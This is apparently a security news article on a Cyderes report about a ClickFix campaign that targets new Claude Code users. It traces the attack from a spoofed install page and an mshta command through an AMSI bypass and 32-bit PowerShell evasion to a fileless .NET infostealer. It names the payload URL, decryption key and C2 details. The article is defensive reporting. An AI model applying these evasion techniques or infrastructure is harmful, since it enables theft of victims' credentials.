A new threat intelligence report by security research firm Cyderes has exposed an active credential theft campaign targeting first-time users of Anthropic’s Claude Code tool.

Shared with Hackread.com, the findings show how threat actors exploit the rapid adoption of AI coding tools to compromise small business owners, entrepreneurs, and teachers who lack enterprise-grade protections.

The ClickFix Attack Chain

Cyderes’ research reveals that the attack begins with SEO poisoning; when a user searches for how to install the software, they are taken to a spoofed Anthropic page. They are then instructed to open the Windows Run dialog box (Win+R) and paste a malicious mshta.exe command. This is a classic ClickFix lure that helps the attackers establish hands-on keyboard execution to bypass automated sandbox analysis.

The file mshta.exe, when executed, retrieves a 6.7 MB MP3/HTA polyglot payload from download.version-516.com/claude. This file runs two formats at once; it contains valid audio tags and cover art to pass file-type inspection, and also hides an embedded HTA script block, which is processed by mshta.exe after which the system runs the malicious script.

In-Memory Execution

According to Cyderes’ blog post, on the computer, this script immediately sets up a hidden task to open an older 32-bit version of Windows PowerShell instead of the 64-bit version. Researchers believe that the hackers specifically chose this version because modern Endpoint Detection and Response (EDR) systems usually only check the 64-bit version.

After opening PowerShell, the malicious loader performs an AMSI bypass. It is a technique that basically turns off the Windows built-in script scanner to stay undetected. It then uses a secret key (BWJFEesMEqRvjQbm) to unlock its hidden code and mixes the victim’s computer name and username into a unique scrambled code.

The last step is connecting to the internet to download a huge 17 MB script from oakenfjrodru. According to researchers, the hackers intentionally made this file so large to overwhelm security testing tools (called sandboxes) and make them crash. This process is carried out inside the computer’s temporary memory, so no files get saved to the hard drive, making the attack nearly invisible.

Final Payload and Attribution

A reflective .NET infostealer is embedded inside the Stage 3 script. By abusing the .NET Framework’s Assembly.Load(byte[]) feature, the loader manages to execute code directly within the existing PowerShell.exe address space so that the attack remains fileless.

Now, the data stealing begins, where the infostealer accesses the browser credential store to steal saved data. It then connects to a C2 server at 185177239255:443 for sending the data. Researchers noted that this IP address routes directly to Russian infrastructure.

Cyderes’ research team has confirmed that Anthropic itself hasn’t been compromised. The firm advises defenders to block wildcard queries to *.oakenfjrod.ru and monitor outbound network connections from mshta.exe to ensure individual workstations remain protected against this ongoing campaign.